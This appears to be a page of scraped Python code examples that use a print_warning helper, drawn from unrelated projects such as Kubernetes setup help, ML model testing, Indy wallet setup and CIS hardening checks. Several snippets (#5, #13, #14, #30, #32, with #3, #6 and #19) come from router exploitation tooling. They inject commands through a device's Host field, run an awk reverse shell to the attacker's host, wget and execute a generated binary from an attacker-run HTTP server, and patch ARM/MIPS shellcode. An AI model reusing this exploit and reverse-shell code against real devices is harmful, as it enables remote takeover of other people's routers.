Пример #1
0
def print_help_external_ca(hi):
    """ help for external ca installation """

    utils.print_H1('How to setup an external Certificate Authority')
    utils.print_normal(
        'By default external CA will be automatically installed by `kubeadm-playground create` ',
        'in case your cluster is configured with `certificateAuthority: external`'
    )
    if hi.cluster.certificateAuthority != kubeadm_utils.CERTIFICATEAUTHORITY_TYPE_EXTERNAL:
        print
        utils.print_warning(
            'The kubeadm playground currently does not require an external ca.',
            'Please change your cluster api specification')

    utils.print_H2('Assisted mode')
    utils.print_normal(
        "* only if automatic installation was disabled during create")
    utils.print_code("kubeadm-playground exec external-ca")

    utils.print_H2('Manual mode')
    ssh_to(hi.bootstrapMaster.name)
    utils.print_normal('- Create an external CA by executing:')
    utils.print_code(
        "sudo %s alpha phase certs all --config /etc/kubernetes/kubeadm.conf" %
        (hi.kubeadm_binary), 'sudo rm /etcd/kubernetes/pki/ca.key',
        'sudo rm /etcd/kubernetes/pki/front-proxy-ca.key')
    print
Пример #2
0
def print_help_external_etcd(hi):
    """ help for external etcd installation """

    utils.print_H1('How to install an external Etcd')
    utils.print_normal(
        'By default external etcd will be automatically installed by `kubeadm-playground create` ',
        "in case your cluster has machines with role '%s'." %
        (cluster_api.ROLE_ETCD))
    if len(hi.etcds) == 0:
        print
        utils.print_warning(
            'The kubeadm playground currently does not require an external etcd.',
            'Please change your cluster api specification')

    utils.print_H2('Assisted mode')
    utils.print_normal(
        "* only if automatic installation was disabled during create")
    utils.print_code("kubeadm-playground exec external-etcd")

    utils.print_H2('Manual mode')
    utils.print_normal('- Install etcd on following machines:')
    for m in hi.etcds:
        utils.print_normal("   - %s" % (m.name))
    print
    utils.print_normal(
        "- Ensure that etcd endpoint and eventually etcd TLS certificates are set in '/etc/kubernetes/kubeadm.conf' on %s"
        % (hi.bootstrapMaster.name))
    print
Пример #3
0
    def login(self, host, port, timeout):
        url = 'http://{}:{}/'.format(host, port)
        resp, err = self.http_get(self.s, url, timeout)
        if err:
            self.print_requests_err(host, port, err)
            return False

        utils.print_info('"Retrieving random login token..."')
        token = self.regx_grab(resp.text, r'Frm_Logintoken"\)\.value = "(.*)";', 1)
        if token:
            utils.print_info(
                "Trying to log in with credentials {} : {}".format(self.username, self.password))
            url = 'http://{}:{}/'.format(host, port)
            data = {"Frm_Logintoken": token,
                    "Username": self.username,
                    "Password": self.password,
                    "action": "login"}
            resp, err = self.http_post(self.s, url, timeout, data)
            if err:
                utils.print_warning('{}:{} request error, msg: {}'.format(host, port, type(err).__name__))
                return False
            if "Username" not in resp.text and "Password" not in resp.text:
                utils.print_success("Successful authentication")
                return True
            else:
                return False
        else:
            utils.print_warning('Can not find the login token')
            return False
def test_models_parallel(models_dir, out_dir, test_dir=None, test_file=None):
    """Description of test_models_parallel

    17h16m12s DecisionTree done in 16135373ms
    17h25m08s GradientBoosting done in 16671109ms
    18h59m05s RandomForest done in 22307811ms
    18h59m07s AdaBoost done in 22310633ms
    19h18m12s ExtraTrees done in 23455779ms

    """
    models_dir = utils.abs_path_dir(models_dir) + "/"
    models = os.listdir(models_dir)
    utils.create_dir(out_dir)

    if test_dir is not None:
        test_dir = utils.abs_path_dir(test_dir) + "/"
        test_files = os.listdir(test_dir)
        test_file = None
    elif test_file is not None:
        test_files = None
    else:
        utils.print_warning(
            "TODO Error in arg for test_models_parallel() function")

    partial_test_model = partial(test_model,
                                 models_dir=models_dir,
                                 test_dir=test_dir,
                                 out_dir=out_dir,
                                 test_files=test_files,
                                 test_file=test_file)
    pool = multiprocessing.Pool(len(models))
    pool.map(partial_test_model, models)  #make our results with a map call
    pool.close()  #we are not adding any more processes
    pool.join()  #tell it to wait until all threads are done before going on
Пример #5
0
    def wget(self, binary, location):
        print_warning("Using wget method")
        # generate binary
        self.generate_binary(self.lhost, self.lport)

        # run http server
        thread = threading.Thread(target=self.http_server,
                                  args=(self.lhost, self.lport))
        thread.start()

        # wget binary
        print_warning("Using wget to download binary")
        cmd = "{} http://{}:{}/{} -O {}/{}".format(binary, self.lhost,
                                                   self.lport,
                                                   self.binary_name, location,
                                                   self.binary_name)

        self.exploit.execute(cmd)

        # execute binary
        sock = self.listen(self.lhost, self.lport)
        self.execute_binary(location, self.binary_name)

        # waiting for shell
        self.shell(sock)
Пример #6
0
    def check(self, host, port, timeout):
        utils.print_info('Use username: {}, password: {}'.format(self.username, self.password))
        if self.input_to_continue():
            if self.login(host, port, timeout):
                url = self.check_url.format(host, port)
                resp, err = self.http_get(self.s, url, timeout)
                if err:
                    self.print_requests_err(host, port, err)
                    self.print_check_result(False, host)
                else:
                    textarea_1_match = re.compile(r'textarea cols="" rows="" class="textarea_1"', re.S).search(resp.text)
                    if textarea_1_match:
                        self.print_check_result(True, host)
                        return True
                    else:
                        utils.print_warning('Device is busy, please wait')
                        return False
            else:
                utils.print_failed('Login failed')
                self.print_check_result(False, host)
                return False
        else:
            self.set_credits()
            return self.check(host, port, timeout)

        return False
Пример #7
0
def run_kea_on_folds(folds_dir):
    """Description of run_kea_on_folds

    Wrapper for kea on folds
    """
    folds_dir = utils.abs_path_dir(folds_dir)
    out_file = folds_dir + "/results.txt"
    if os.path.exists(folds_dir + "/train_test.arff"):
        train_file = folds_dir + "/train_test.arff"
        test_file = train_file
        run_kea(train_file, test_file, out_file)
    else:
        nb_folds = len([
            name for name in os.listdir(folds_dir)
            if os.path.isfile(os.path.join(folds_dir, name))
        ])
        # Run on multiple train/test
        for index in range(1, int(nb_folds / 2) + 1):
            utils.print_success("Train/Test on fold " + str(index))
            train_file = folds_dir + "/train_" + str(index).zfill(2) + ".arff"
            test_file = folds_dir + "/test_" + str(index).zfill(2) + ".arff"
            out_file = folds_dir + "/results_" + str(index).zfill(2) + ".arff"
            run_kea(train_file, test_file, out_file)

        utils.print_warning("TODO multiprocessing")
Пример #8
0
def print_help_external_vip(hi):
    """ help for external vip installation """
    
    utils.print_H1 ('How to setup an external Vip/load balancer')
    if len(hi.etcds) == 0:
        print
        utils.print_warning ('The kubeadm playground currently does not require an external vip.',
                             'Please change your cluster api specification')

    utils.print_normal ('By default external etcd will be automatically installed by `kubeadm-playground create` ',
                "in case your cluster has more then one machines with role '%s'." % (cluster_api.ROLE_MASTER))

    utils.print_H2 ('Assisted mode')
    utils.print_normal ("* only if automatic installation was disabled during create")

    utils.print_H2 ('Assisted mode')
    utils.print_normal ('By default external vip/load balancer will be automatically installed by `kubeadm-playground create` ',
                'in case your cluster is configured with more than one machine with role `Master`',
                ''
                "The vip address will be %s (%s) and will balance following api server end points:" % (hi.kubernetes_vip_fqdn, hi.kubernetes_vip_ip))
    for m in hi.masters:
        utils.print_normal ("- https://%s:6443" % (m.ip))

    print
    utils.print_normal ('If automatic installation of external vip was disabled during create, it can be invoked afterwards with:')

    utils.print_code ("kubeadm-playground exec external-vip")

    utils.print_H2 ('Manual mode')
    utils.print_normal ('- Create an external VIP/load balancer similar to what described above.')
    utils.print_normal ("- Ensure that the VIP address is set in '/etc/kubernetes/kubeadm.conf' on %s." % (hi.bootstrapMaster.name))
    print
Пример #9
0
def print_help_kubeadm_join(hi):
    utils.print_H1("How to execute kubeadm join")
    if len(hi.nodes) == 0:
        print
        utils.print_warning(
            'The kubeadm playground currently does not have worker nodes.',
            'Please change your cluster api specification')

    utils.print_H2('Assisted mode')
    utils.print_code("kubeadm-playground exec kubeadm-join")

    utils.print_H2('Manual mode')
    utils.print_normal(
        "Repeat following steps for all the machines with role '%s'" %
        (cluster_api.ROLE_NODE))
    if hi.kubernetes_cni_sysconf:
        utils.print_normal(
            "- Make required changes for %s CNI plugin to work:" %
            (hi.networkAddon))
        utils.print_code('sudo sysctl net.bridge.bridge-nf-call-iptables=1')
    utils.print_normal('- Join the worker node')
    utils.print_code(
        "sudo %s join %s:6443 --token %s \\" %
        (hi.kubeadm_binary, hi.controlplaneEndpoint, hi.kubeadm_token),
        "         --discovery-token-unsafe-skip-ca-verification")
Пример #10
0
    def start(self):
        """
        Start processing the log file.
        """
        print_info(f"Start monitoring {self.log_file}")
        with open(self.log_file) as log_file:
            reader = DictReader(log_file)

            # Keep track of the number of requests in the log window.
            request_counts = []
            while True:
                try:
                    timestamp, average_bytes, most_hit_section, count = self.read_logs(reader, self.log_interval)
                    print_info(f"{timestamp}\t{average_bytes:.2f}\t{most_hit_section}")

                    request_counts.append(count)
                    # Only keep enough counts to cover the time in the log window.
                    request_counts = request_counts[-(self.log_window // self.log_interval):]
                    requests_per_second = sum(request_counts) / self.log_window

                    # Check if the requests per second has exceeded or recovered from the traffic threshold.
                    if requests_per_second >= self.threshold and self.high_traffic is False:
                        print_error(f"High traffic generated an alert - hits = {requests_per_second:.2f} requests per "
                                    f"second, triggered at {timestamp}")
                        self.high_traffic = True
                    elif requests_per_second < self.threshold and self.high_traffic is True:
                        print_success(f"Traffic has stabilized - hits = {requests_per_second:.2f} requests per second, "
                                      f"recovered at {timestamp}")
                        self.high_traffic = False

                    # Simulate time passing. DO NOT USE for real access logs.
                    time.sleep(self.log_interval)
                except StopIteration:
                    print_warning("End of file has been reached.")
                    break
Пример #11
0
 def cmdloop(self, intro=None):
     self.generate_prompt()
     while True:
         try:
             super(BaseInterpreter, self).cmdloop()
             break
         except KeyboardInterrupt:
             utils.print_warning('^C')
Пример #12
0
def preprocess_testset():
    utils.print_success("Preprocessing test set")
    utils.print_warning("Preprocessing whole test set since the beginning")
    groundtruths = utils.get_test_gts()
    new_file = open("vqmm/test.txt", "w")
    with open("vqmm/old.txt", "r") as filep:
        for line in filep:
            if line[56:68] in groundtruths:
                new_file.write(line)
    new_file.close()
Пример #13
0
    def awk(self, binary):
        print_warning("Using awk method")

        # run reverse shell through awk
        sock = self.listen(self.lhost, self.lport)
        cmd = binary + " 'BEGIN{s=\"/inet/tcp/0/" + self.lhost + "/" + self.lport + "\";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)};'"
        self.exploit.execute(cmd)

        # waiting for shell
        self.shell(sock)
Пример #14
0
    def shell(self, sock):
        print_warning("Waiting for reverse shell...")
        client, addr = sock.accept()
        sock.close()
        print_warning("Connection from {}:{}".format(addr[0], addr[1]))

        print_success("Enjoy your shell")
        t = telnetlib.Telnet()
        t.sock = client
        t.interact()
Пример #15
0
def test_model(model, models_dir, test_dir, out_dir, test_files=None, test_file=None):
    """Description of test_model

    Use one model previously fitted in order to predict_proba() or predict()
    the tag for a bunch of test_files 

    ..todo::
    
    To enhance computation time: only compute file which are in groundtruths
    if file already computed, do not recompute

    """
    begin = int(round(time.time() * 1000))
    utils.print_success("Testing " + model)
    pred_dir = out_dir + model
    clf = joblib.load(models_dir + model + "/" + model + ".pkl")
    if test_files is not None:
        pred_dir = pred_dir + "/"
        utils.create_dir(pred_dir)
        for index, test_file in enumerate(test_files):
            # Check if isrc is in groundtruths to speed up computation time
            if test_file[:12] in groundtruths:
                test_features = read_test_file(test_dir + test_file)
                try:
                    predictions = clf.predict_proba(test_features)
                except AttributeError:
                    utils.print_warning("predict_proba does not exists for " + model + "\nRegular predict function is used.")
                    predictions = clf.predict(test_features)
                with open(pred_dir + test_file, "w") as filep:
                    for pred in predictions:
                        filep.write(str(pred[0]) + "\n")
    elif test_file is not None:
        pred_dir = pred_dir + "_"
        test_features = []
        filename = []
        with open(test_file, "r") as filep:
            for index, line in enumerate(filep):
                line = line.split(",")
                # print(str(index) + " " + line[0])
                test_features.append(line[1:-1])
                filename.append(line[0])
        try:
            predictions = clf.predict_proba(test_features)
            with open(pred_dir + "predict_proba.csv", "a") as filep2:
                for filen, pred in zip(filename, predictions):
                    filep2.write(filen + "," + str(pred[0]) + "\n")
        except:
            pass
        predictions = clf.predict(test_features)
        with open(pred_dir + "predict.csv", "a") as filep2:
            for filen, pred in zip(filename, predictions):
                filep2.write(filen + "," + str(pred[0]) + "\n")
    else:
        utils.print_error("Error in arg for test_model() function")
    utils.print_info(model + " done in " + str(int(round(time.time() * 1000)) - begin) + "ms")
Пример #16
0
def get_returncode():
    clear_historical_outputs()
    give_command("echo $?")
    output = poll_output(timeout=1000)
    if output.isdigit():
        return int(output)
    elif len(output) == 0:
        return -1
    else:
        utils.print_warning(
            "[WARNING] get_returncode() returned other output: %s" % output)
        return output
Пример #17
0
    def load_hyperparams(self):
        try:
            with open(self.path_hyperparams_file, 'r') as fp:
                self.hyper = json.load(fp)
        except Exception as e:
            handle_warning(
                "Failed to load hyper parameters file '{0}'.".format(
                    self.path_hyperparams_file), e)
            print_warning("Using default hyper parameters instead...")
            return None

        return self.hyper
Пример #18
0
def merge_arff(indir, outfilename):
    """Description of merge_arff

    bextract programm from Marsyas generate one output file per audio file
    This function merge them all in one unique file
    Check if analysed file are valid i.e. not empty
    """
    utils.print_success("Preprocessing ARFFs")
    indir = utils.abs_path_dir(indir)
    tmpfilename = "tmp_arff.txt"
    os.system("ls " + indir + " > " + tmpfilename)
    with open(tmpfilename, 'r') as filenames:
        outfn = open(outfilename, 'w')
        cpt_invalid_fn = 0
        # Write first lines of ARFF template file
        for filename in filenames:
            filename = validate_arff(indir + "/" + filename[:-1])
            if filename:
                with open(filename, 'r') as template:
                    nb_line = 77
                    for line in template:
                        if not nb_line:
                            break
                        nb_line -= 1
                        outfn.write(line)
                    break
            else:
                cpt_invalid_fn += 1
        # Append all arff file to the output file
        cur_file_num = 1
        for filename in filenames:
            filename = validate_arff(indir + "/" + filename[:-1])
            if filename:
                cur_file_num = cur_file_num + 1
                sys.stdout.write("\r\tAnalysing file\t" + str(cur_file_num))
                sys.stdout.flush()
                fname = open(filename, 'r')
                outfn.write("".join(fname.readlines()[74:77]))
                fname.close()
            else:
                cpt_invalid_fn += 1
        sys.stdout.write('\n')
        sys.stdout.flush()
        outfn.close()
    os.remove(tmpfilename)
    if cpt_invalid_fn:
        utils.print_warning(str(cpt_invalid_fn) + " ARFF with errors found")
    utils.print_success("Preprocessing done")
    return outfilename
Пример #19
0
    def execute(self, host, port, timeout, cmd):
        self.post_data['Host'] = self.command.format(cmd)
        self.result_data['Host'] = self.command.format(cmd)
        self.check_url = self.check_url.format(host, port)
        resp, err = self.http_post(self.s, self.check_url, timeout, self.post_data)
        if err:
            utils.print_warning(err)

        time.sleep(5)

        resp, err = self.http_post(self.s, self.check_url, timeout, self.result_data)
        if err:
            self.print_requests_err(host, port, err)
            return ''
        return self.regx_grab(resp.text, r'textarea_1">(.*?)</textarea>', 1)
Пример #20
0
    def read_checkpoint_file(self):
        """Read the 'checkpoint.json' file and update the class variables accordingly."""
        checkpoint = None
        if os.path.isfile(self.path_checkpoint_file):
            print_positive("Found checkpoint file: {}".format(
                self.path_checkpoint_file))
            print_info("Verifying integrity of checkpoint file...")
            try:
                with open(self.path_checkpoint_file, "r") as fp:
                    try:
                        checkpoint = json.load(fp)
                    except ValueError as e:
                        handle_error(
                            "Failed to open checkpoint file '{0}'. ".format(
                                self.path_checkpoint_file) +
                            "It does not appear to be a valid JSON file.", e)
                        checkpoint = None
            except IOError as e:
                handle_error(
                    "Unable to open checkpoint file '{}' for reading.".format(
                        self.path_checkpoint_file), e)
        ### Failed to find or open checkpoint file. Set some values to 0 and exit
        if checkpoint != None:
            ### Succesfully loaded check point file, gather the data!
            print_positive(
                "Successfully loaded checkpoint! Reading its data...")
            self.epochs_completed = checkpoint['epochs_completed']
            if checkpoint['model'] != settings.MODEL:
                print_warning(
                    "Inconsistency detected: the checkpoint model '{0}' does not match command line argument of '{1}'."
                    .format(checkpoint['model'], settings.MODEL))
                print_info("Discarding checkpoint and starting from scratch.")
                return None
            if checkpoint['exp_name'] != settings.EXP_NAME:
                print_warning(
                    "Inconsistency detected: the checkpoint experiment name '{0}' does not match command line argument of '{1}'."
                    .format(checkpoint['exp_name'], settings.EXP_NAME))
                print_info("Discarding checkpoint and starting from scratch.")
                return None

            self.wall_time = checkpoint['wall_time']
            self.process_time = checkpoint['process_time']
        else:
            self.epochs_completed = 0
            self.wall_time = 0
            self.process_time = 0

        return checkpoint
Пример #21
0
def merge_arff(indir, outfilename):
    """Description of merge_arff

    bextract program from Marsyas generate one output file per audio file
    This function merge them all in one unique file
    Check if analysed file are valid i.e. not empty
    """
    utils.print_success("Preprocessing ARFFs")
    indir = utils.abs_path_dir(indir)
    filenames = os.listdir(indir)
    outfn = open(outfilename, 'w')
    cpt_invalid_fn = 0
    # Write first lines of ARFF template file
    for filename in filenames:
        if os.path.isfile(indir + filename):
            new_fn = validate_arff(indir + filename)
            if new_fn:
                with open(new_fn, 'r') as template:
                    nb_line = 74
                    for line in template:
                        if not nb_line:
                            break
                        nb_line -= 1
                        outfn.write(line)
                    break
            else:
                cpt_invalid_fn += 1
    # Append all arff file to the output file
    cur_file_num = 1
    for filename in filenames:
        if os.path.isfile(indir + filename):
            new_fn = validate_arff(indir + filename)
            if new_fn:
                cur_file_num = cur_file_num + 1
                utils.print_progress_start("Analysing file\t" +
                                           str(cur_file_num))
                fname = open(new_fn, 'r')
                outfn.write("".join(fname.readlines()[74:77]))
                fname.close()
            else:
                cpt_invalid_fn += 1
    utils.print_progress_end()
    outfn.close()
    # os.system("rm " + indir + "*.arff")
    if cpt_invalid_fn:
        utils.print_warning(
            str(cpt_invalid_fn) + " ARFF files with errors found")
    return outfilename
Пример #22
0
def delete_vm(vm):
    if not configs.sla_configs.has_key(vm):
        utils.print_error("There isn't a VM named '%s'" % vm)
        print "All available VM names:"
        print '\n'.join(configs.keys())
        return

    utils.print_highlight("====Deleting %s====" % vm)
    cfg = configs.sla_configs[vm]
    utils.print_highlight("Deleting vm: %s" % vm)
    if cfg['vm_type'] == "server":
        delete_server_instance(cfg['deploy_config']['INSTANCE_NAME'],
                               cfg['deploy_config']['KEY_NAME'], vm)
    else:
        utils.print_warning(
            "Cannot delete - Unknown or yet-to-implement VM type: %s" %
            cfg['vm_type'])
def login(driver):
    username = input('Enter UM username: '******'Enter UM password: '******'loginSubmit').click()

    if driver.find_element_by_id('title').text == "Two-Factor Authentication Required":
        # Wait for Two Factor Auth
        print_warning("Please accept 2FA authentication request.\n")
        while driver.title != 'College of Engineering Lecture Recordings - Available Courses':
            time.sleep(2)
Пример #24
0
def try_printed_by(struct: FirstOrderStructure, s: SortDecl, elt: str) -> Optional[str]:
    custom_printer_annotation = syntax.get_annotation(s, 'printed_by')

    if custom_printer_annotation is not None:
        assert len(custom_printer_annotation.args) >= 1
        import importlib
        printers = importlib.import_module('printers')
        printer_name = custom_printer_annotation.args[0]
        custom_printer = printers.__dict__.get(printer_name)
        custom_printer_args = custom_printer_annotation.args[1:] \
            if custom_printer is not None else []
        if custom_printer is not None:
            return custom_printer(struct, s, elt, custom_printer_args)
        else:
            utils.print_warning(custom_printer_annotation.span,
                                'could not find printer named %s' % (printer_name,))
    return None
Пример #25
0
    async def _create_wallet(self):
        """
        Create wallet.
        """

        try:
            utils.print_header("\n\tCreate wallet")
            await wallet.create_wallet(self.pool_name, self.wallet_name, None,
                                       None, None)
        except IndyError as e:
            if e.error_code == 203:
                utils.print_warning("Wallet '%s' already exists.  "
                                    "Skipping wallet creation..." %
                                    str(self.wallet_name))
            else:
                utils.print_error(str(e))
                raise
    def load_model(self):
        """Return True if a valid model was found and correctly loaded. Return False if no model was loaded."""
        from shutil import copyfile
        from keras.models import load_model

        chosen_model_path = None
        best_model_path = None
        best_model_glob = glob.glob(settings.MODELS_DIR + "/best_model_*.hdf5")
        if len(best_model_glob) > 0:
            best_model_path = best_model_glob[0]
            chosen_model_path = best_model_path
            print_positive("Loading *best* model with the lowest validation score: {}"
                           .format(best_model_path))
        if best_model_path == None:
            model_epoch_filename = "model_epoch_{0:0>4}.hdf5".format(self.epochs_completed)
            most_recent_model_path = os.path.join(settings.CHECKPOINTS_DIR, model_epoch_filename)
            chosen_model_path = self.model_path
            if not os.path.isfile(chosen_model_path):
                if not os.path.isfile(most_recent_model_path):
                    print_warning("Unexpected problem: cannot find the model's HDF5 file anymore at path:\n'{}'".format(most_recent_model_path))
                    return False
                else:
                    chosen_model_path = most_recent_model_path

            print_positive("Loading last known valid model (this includes the complete architecture, all weights, optimizer's state and so on)!")

        # Check if file is readable first
        try:
            open(chosen_model_path, "r").close()
        except Exception as e:
            handle_error("Lacking permission to *open for reading* the HDF5 model located at\n{}."
                         .format(chosen_model_path), e)
            return False
        
        # Load the actual HDF5 model file
        try:
            self.keras_model = load_model(chosen_model_path)
        except Exception as e:
            handle_error("Unfortunately, the model did not parse as a valid HDF5 Keras model and cannot be loaded for an unkown reason. A backup of the model will be created, after which training will restart from scratch.".format(chosen_model_path), e)
            try:
                copyfile(chosen_model_path, "{}.backup".format(chosen_model_path))
            except Exception as e:
                handle_error("Looks like you're having a bad day. The copy operation failed for an unknown reason. We will exit before causing some serious damage ;). Better luck next time. Please verify your directory permissions and your default umask!.", e)
                sys.exit(-3)
            return False
        return True
Пример #27
0
    async def _create_pool_config(self):
        """
        Create pool configuration from genesis file.
        """
        try:
            utils.print_header("\n\n\tCreate ledger config "
                               "from genesis txn file")

            pool_config = json.dumps(
                {'genesis_txn': self.config.pool_genesis_file})
            await pool.create_pool_ledger_config(self.pool_name, pool_config)
        except IndyError as e:
            if e.error_code == 306:
                utils.print_warning("The ledger already exists, moving on...")
            else:
                utils.print_error(str(e))
                raise
Пример #28
0
    async def _create_pool_config(self):
        """
        Create pool configuration from genesis file.
        """
        try:
            utils.print_header("\n\n\tCreate ledger config "
                               "from genesis txn file")

            pool_config = json.dumps(
                {'genesis_txn': self.config.pool_genesis_file})
            await pool.create_pool_ledger_config(self.pool_name,
                                                 pool_config)
        except IndyError as e:
            if e.error_code == 306:
                utils.print_warning("The ledger already exists, moving on...")
            else:
                utils.print_error(str(e))
                raise
Пример #29
0
    async def _create_wallet(self):
        """
        Create wallet.
        """

        try:
            utils.print_header("\n\tCreate wallet")
            await wallet.create_wallet(self.pool_name,
                                       self.wallet_name,
                                       None, None, None)
        except IndyError as e:
            if e.error_code == 203:
                utils.print_warning(
                    "Wallet '%s' already exists.  "
                    "Skipping wallet creation..." % str(
                        self.wallet_name))
            else:
                utils.print_error(str(e))
                raise
Пример #30
0
    def generate_binary(self, lhost, lport):
        print_warning("Generating reverse shell binary")
        self.binary_name = random_text(8)
        ip = self.convert_ip(lhost)
        port = self.convert_port(lport)

        if self.arch == 'arm':
            self.revshell = self.arm[:0x104] + ip + self.arm[
                0x108:0x10a] + port + self.arm[0x10c:]
        elif self.arch == 'mipsel':
            self.revshell = self.mipsel[:0xe4] + port + self.mipsel[
                0xe6:0xf0] + ip[2:] + self.mipsel[
                    0xf2:0xf4] + ip[:2] + self.mipsel[0xf6:]
        elif self.arch == 'mips':
            self.revshell = self.mips[:0xea] + port + self.mips[
                0xec:0xf2] + ip[:2] + self.mips[0xf4:0xf6] + ip[
                    2:] + self.mips[0xf8:]
        else:
            print_failed("Platform not supported")
Пример #31
0
    def __exit__(self, *args):
        data_producing.clear()
        try:
            while not data_queue.empty():
                time.sleep(1)
        except KeyboardInterrupt:
            utils.print_info("\rClear remaining tasks...")
            data_queue.queue.clear()
        finally:
            utils.print_warning(
                "All tasks dispatched\nWaiting for already scheduled jobs to finish..."
            )
            for worker in self.start_worker:
                worker.join()
            data_queue.unfinished_tasks = 0

        utils.print_info(
            'Elapsed time: {0:.2f} seconds'.format(time.time() -
                                                   self.start_time))
Пример #32
0
    def echo(self, binary, location):
        print_warning("Using echo method")

        # generate binary
        self.generate_binary(self.lhost, self.lport)
        path = "{}/{}".format(location, self.binary_name)

        size = len(self.revshell)
        num_parts = (size / 30) + 1

        # transfer binary through echo command
        print_warning("Using echo method to transfer binary")
        for i in range(0, num_parts):
            current = i * 30
            print_warning("Transferring {}/{} bytes".format(
                current, len(self.revshell)))

            block = self.revshell[current:current + 30].encode('hex')
            block = "\\x" + "\\x".join(
                a + b for a, b in zip(block[::2], block[1::2]))
            cmd = '$(echo -n -e "{}" >> {})'.format(block, path)
            self.exploit.execute(cmd)

        # execute binary
        sock = self.listen(self.lhost, self.lport)
        self.execute_binary(location, self.binary_name)

        # waiting for shell
        self.shell(sock)
Пример #33
0
 def warning(self, msg):
     print_warning(msg)
Пример #34
0
Файл: cis4.py Проект: Nemie/syco
    "net.ipv4.conf.default.rp_filter = 1"
)

#
print_header("4.2.8 Enable TCP SYN Cookies (Scored)")
check_equal(
    "/sbin/sysctl net.ipv4.tcp_syncookies",
    "net.ipv4.tcp_syncookies = 1"
)

#
print_header("4.3 Wireless Networking")

#
print_header("4.3.1 Deactivate Wireless Interfaces (Not Scored)")
print_warning("Check manually for wireless interfaces.")
view_output("ifconfig -a")

#
print_header("4.4 Disable IPv6")

#
print_header("4.4.1 Configure IPv6")

#
print_header("4.4.1.1 Disable IPv6 Router Advertisements (Not Scored)")
check_equal(
    "/sbin/sysctl net.ipv6.conf.all.accept_ra",
    'error: "net.ipv6.conf.all.accept_ra" is an unknown key'
)
check_equal(
Пример #35
0
Файл: cis5.py Проект: Nemie/syco
#
print_header("5.1.2 Activate the rsyslog Service (Scored)")
check_equal(
    "rpm -q syslog",
    "package syslog is not installed"
)
check_empty("chkconfig --list | grep syslog")
check_equal_re(
    "chkconfig --list rsyslog",
    "rsyslog.*0:off.*1:off.*2:on.*3:on.*4:on.*5:on.*6:off"
)

#
print_header("5.1.3 Configure /etc/rsyslog.conf (Not Scored)")
print_warning("Manually review the contents of the /etc/rsyslog.conf file to ensure appropriate logging is set. ")
view_output("ls -l /var/log/")

#
print_header("5.1.4 Create and Set Permissions on rsyslog Log Files (Scored)")
print_header(" TODO - Ensure that the log files are logging information")

#
print_header("5.1.5 Configure rsyslog to Send Logs to a Remote Log Host (Scored)")
expect = "^*.*[^I][^I]*@{0}".format(config.general.get_log_server_hostname1())
check_equal(
    "grep '%s' /etc/rsyslog.conf" % expect,
    expect
)

expect = "^*.*[^I][^I]*@{0}".format(config.general.get_log_server_hostname2())
Пример #36
0
Файл: cis9.py Проект: Nemie/syco
__license__ = "???"
__version__ = "1.0.0"
__status__ = "Production"


from utils import check_empty, check_equal, check_equal_re, check_equals, check_not_empty, check_return_code, print_header, view_output, print_warning, print_info

#
print_header("9 System Maintenance")

#
print_header("9.1 Verify System File Permissions)")

#
print_header("9.1.1 Verify System File Permissions (Not Scored)")
print_warning("Check manually for changed files.")
view_output("rpm -Va --nomtime --nosize --nomd5 --nolinkto")

#
print_header("9.1.2 Verify Permissions on /etc/passwd (Scored)")
check_equal('stat -c "%a %u %g" /etc/passwd | egrep "644 0 0"', "644 0 0")

#
print_header("9.1.3 Verify Permissions on /etc/shadow (Scored)")
check_equal('stat -c "%a %u %g" /etc/shadow | egrep "0 0 0"', "0 0 0")

#
print_header("9.1.4 Verify Permissions on /etc/gshadow (Scored)")
check_equal('stat -c "%a %u %g" /etc/gshadow | egrep "0 0 0"', "0 0 0")

#
Пример #37
0
 def check_seq(seq_record):
     fasta_seq_len = len(seq_record.seq)
     if reference_sequence_len != fasta_seq_len:
         utils.print_warning(
             '%s: invalid length %s (%s expected)' % (seq_record.description, fasta_seq_len, reference_sequence_len))
Пример #38
0
Файл: cis1.py Проект: Nemie/syco
#
print_header("1.1.8 Create Separate Partition for /var/log/audit (Scored)")
check_equal("grep '/var/log/audit ' /etc/fstab", "/var/log/audit")

#
print_header("1.1.9 Create Separate Partition for /home (Scored)")
check_equal("grep '/home ' /etc/fstab", "/home")

#
print_header("1.1.10 Add nodev Option to /home (Scored)")
check_equal("grep /home /etc/fstab", "nodev")
check_equal("mount | grep /home", "nodev")

#
print_header("1.1.11 Add nodev Option to Removable Media Partitions (Not Scored)")
print_warning("Check manually for nodev on removable media.")
view_output("cat /etc/fstab")

#
print_header("1.1.12 Add noexec Option to Removable Media Partitions (Not Scored)")
print_warning("Check manually for noexec on removable media.")
view_output("cat /etc/fstab")

#
print_header("1.1.13 Add nosuid Option to Removable Media Partitions (Not Scored)")
print_warning("Check manually for nosuid on removable media.")
view_output("cat /etc/fstab")

#
print_header("1.1.14 Add nodev Option to /dev/shm Partition (Scored)")
check_equal("grep /dev/shm /etc/fstab | grep nodev", "nodev")
Пример #39
0
def codegen_main():
    arg_parser = argparse.ArgumentParser(description='D-Bus code and documentation generator')
    arg_parser.add_argument('files', metavar='FILE', nargs='*',
                            help='D-Bus introspection XML file')
    arg_parser.add_argument('--xml-files', metavar='FILE', action='append', default=[],
                            help='D-Bus introspection XML file')
    arg_parser.add_argument('--interface-prefix', metavar='PREFIX', default='',
                            help='String to strip from D-Bus interface names for code and docs')
    arg_parser.add_argument('--c-namespace', metavar='NAMESPACE', default='',
                            help='The namespace to use for generated C code')
    arg_parser.add_argument('--c-generate-object-manager', action='store_true',
                            help='Generate a GDBusObjectManagerClient subclass when generating C code')
    arg_parser.add_argument('--c-generate-autocleanup', choices=['none', 'objects', 'all'], default='objects',
                            help='Generate autocleanup support')
    arg_parser.add_argument('--generate-docbook', metavar='OUTFILES',
                            help='Generate Docbook in OUTFILES-org.Project.IFace.xml')
    arg_parser.add_argument('--pragma-once', action='store_true',
                            help='Use "pragma once" as the inclusion guard')
    arg_parser.add_argument('--annotate', nargs=3, action='append', metavar='WHAT KEY VALUE',
                            help='Add annotation (may be used several times)')

    group = arg_parser.add_mutually_exclusive_group()
    group.add_argument('--generate-c-code', metavar='OUTFILES',
                       help='Generate C code in OUTFILES.[ch]')
    group.add_argument('--header', action='store_true',
                       help='Generate C headers')
    group.add_argument('--body', action='store_true',
                       help='Generate C code')

    group = arg_parser.add_mutually_exclusive_group()
    group.add_argument('--output', metavar='FILE',
                       help='Write output into the specified file')
    group.add_argument('--output-directory', metavar='OUTDIR', default='',
                       help='Location to output generated files')

    args = arg_parser.parse_args();

    if len(args.xml_files) > 0:
        print_warning('The "--xml-files" option is deprecated; use positional arguments instead')

    if ((args.generate_c_code is not None or args.generate_docbook is not None) and
            args.output is not None):
